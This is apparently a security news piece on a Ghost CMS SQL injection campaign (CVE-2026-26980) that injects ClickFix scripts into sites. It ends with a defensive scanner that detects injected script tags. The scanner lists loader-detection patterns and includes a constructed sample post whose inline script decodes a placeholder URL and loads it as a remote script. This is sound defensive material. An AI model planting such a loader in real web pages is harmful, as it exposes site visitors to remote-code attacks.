What's Happening?
A critical SQL injection vulnerability in Ghost CMS, tracked as CVE-2026-26980, is being exploited in a large-scale campaign that plants malicious JavaScript on compromised sites to trigger ClickFix attack flows. Discovered by XLab threat intelligence researchers at Qianxin, the campaign has affected more than 700 domains, among them university portals, AI and SaaS companies, media outlets, fintech firms, security sites and personal blogs. The flaw affects Ghost versions 3.24.0 through 6.19.0 and lets unauthenticated attackers access the site database and its admin API keys. A fix was released in February 2026, but many sites have not applied it and remain exposed. With the stolen admin API keys, attackers inject JavaScript into published articles; that first-stage script fetches second-stage code from attacker-controlled infrastructure, which shows visitors a fake Cloudflare verification prompt that leads into the ClickFix flow.
Why It's Important?
Because the flaw is reachable without authentication and exposes admin API keys, a vulnerable Ghost instance can be taken over by anyone who can reach it, and every visitor to an infected site then becomes a target of the ClickFix lure. The spread across education, finance, media and technology shows how quickly an unpatched CMS flaw becomes a problem for readers as well as for site owners, and why patch management must keep pace with published fixes. Organizations running Ghost CMS must treat upgrading to the latest version as urgent. Left unaddressed, such vulnerabilities lead to data breaches, financial losses and reputational damage for the affected entities.
What's Next?
Website administrators are urged to upgrade to Ghost CMS version 6.19.1 or later and to rotate all previously issued keys, since a patched instance stays compromised for as long as the attacker holds a valid admin API key. XLab has published indicators of compromise to help identify and remove the injected scripts. Keeping at least 30 days of admin API call logs is recommended so that a retrospective investigation can establish which keys were used and which posts were modified. Continued monitoring and collaboration with security researchers will be essential to preventing further attacks and keeping web platforms secure.
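The clean-up step above, identifying injected scripts in published posts, can be partly automated. The following is an added example written for this page, not code from the XLab report or from Ghost itself: a triage scanner that walks the `html` of each post (as returned by the Ghost Content API with `formats=html`) and flags script tags whose source host is not on the site's own allowlist, matches a known-bad host, or whose inline body looks like a remote-code loader. The sample posts are constructed, the allowlisted hosts and the site origin are assumptions to replace with your own, and the known-bad set is left empty because the published IoCs are not reproduced here.

```javascript
// Added example, not code from the XLab report or from Ghost.
// Triage scanner for injected <script> tags in Ghost post HTML, the artefact
// left behind when a stolen admin API key is used to edit published articles.
// Input: the "html" field of posts fetched from the Ghost Content API
// (GET /ghost/api/content/posts/?key=...&formats=html).

// Assumption: hosts your theme legitimately loads scripts from.
const ALLOWED_SCRIPT_HOSTS = new Set(["blog.example", "cdn.jsdelivr.net"]);

// Loader domains from the published indicators of compromise belong here.
// Left empty on purpose: this example does not reproduce the real IoC list.
const KNOWN_BAD_HOSTS = new Set();

// Inline fragments typical of a first-stage loader that pulls a second stage
// from a remote host. Heuristic, not a signature for this specific campaign.
const INLINE_LOADER_PATTERNS = [
  /document\.createElement\s*\(\s*['"]script['"]\s*\)/i,
  /\bfetch\s*\(/i,
  /\beval\s*\(/i,
  /\batob\s*\(/i,
  /document\.write\s*\(/i,
];

const SCRIPT_TAG_RE = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
const SRC_ATTR_RE = /\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/i;

// Return every <script> in the HTML as { src, inline }; src is null for inline scripts.
function extractScripts(html) {
  const scripts = [];
  for (const m of html.matchAll(SCRIPT_TAG_RE)) {
    const srcMatch = SRC_ATTR_RE.exec(m[1]);
    const src = srcMatch ? (srcMatch[1] ?? srcMatch[2] ?? srcMatch[3]) : null;
    scripts.push({ src, inline: src !== null ? "" : m[2].trim() });
  }
  return scripts;
}

// Resolve a src attribute (absolute, protocol-relative or relative) against the
// site origin and return its lowercase hostname, or null if it cannot be parsed.
function scriptHost(src, siteOrigin) {
  try {
    return new URL(src, siteOrigin).hostname.toLowerCase();
  } catch {
    return null;
  }
}

// Scan one post and return findings as { postId, kind, detail }.
function scanPost(post, siteOrigin) {
  const findings = [];
  for (const s of extractScripts(post.html || "")) {
    if (s.src !== null) {
      const host = scriptHost(s.src, siteOrigin);
      if (host === null) {
        findings.push({ postId: post.id, kind: "unparseable-src", detail: s.src });
      } else if (KNOWN_BAD_HOSTS.has(host)) {
        findings.push({ postId: post.id, kind: "known-ioc-host", detail: host });
      } else if (!ALLOWED_SCRIPT_HOSTS.has(host)) {
        findings.push({ postId: post.id, kind: "unexpected-script-host", detail: host });
      }
    } else {
      const hit = INLINE_LOADER_PATTERNS.find((re) => re.test(s.inline));
      if (hit) {
        findings.push({ postId: post.id, kind: "inline-loader", detail: hit.source });
      }
    }
  }
  return findings;
}

function scanPosts(posts, siteOrigin) {
  return posts.flatMap((p) => scanPost(p, siteOrigin));
}

// Constructed sample posts; ".invalid" hosts are placeholders, not real IoCs.
const SAMPLE_POSTS = [
  { id: "clean", html: '<p>Hello</p><script src="https://cdn.jsdelivr.net/npm/x.js"></script><script src="/assets/theme.js"></script>' },
  { id: "remote", html: '<p>Intro</p><script src="//loader.example.invalid/cf.js"></script>' },
  { id: "inline", html: '<script>var s=document.createElement("script");s.src=atob("aHR0cHM6Ly9hLmludmFsaWQvc3Rh");document.head.appendChild(s);</script>' },
];

const SITE_ORIGIN = "https://blog.example"; // assumption: your Ghost site URL

if (typeof require !== "undefined" && require.main === module) {
  for (const f of scanPosts(SAMPLE_POSTS, SITE_ORIGIN)) {
    console.log(`${f.postId}: ${f.kind} (${f.detail})`);
  }
}
```

Run it against every post the Content API returns, including drafts and pages fetched through the Admin API if you have a trusted key, and treat each finding as a lead to confirm by hand: a theme that loads analytics from an unlisted CDN will show up as `unexpected-script-host` until its host is added to the allowlist, while a hit on a host from the published IoCs is a confirmed compromise that should trigger key rotation and a review of the admin API logs.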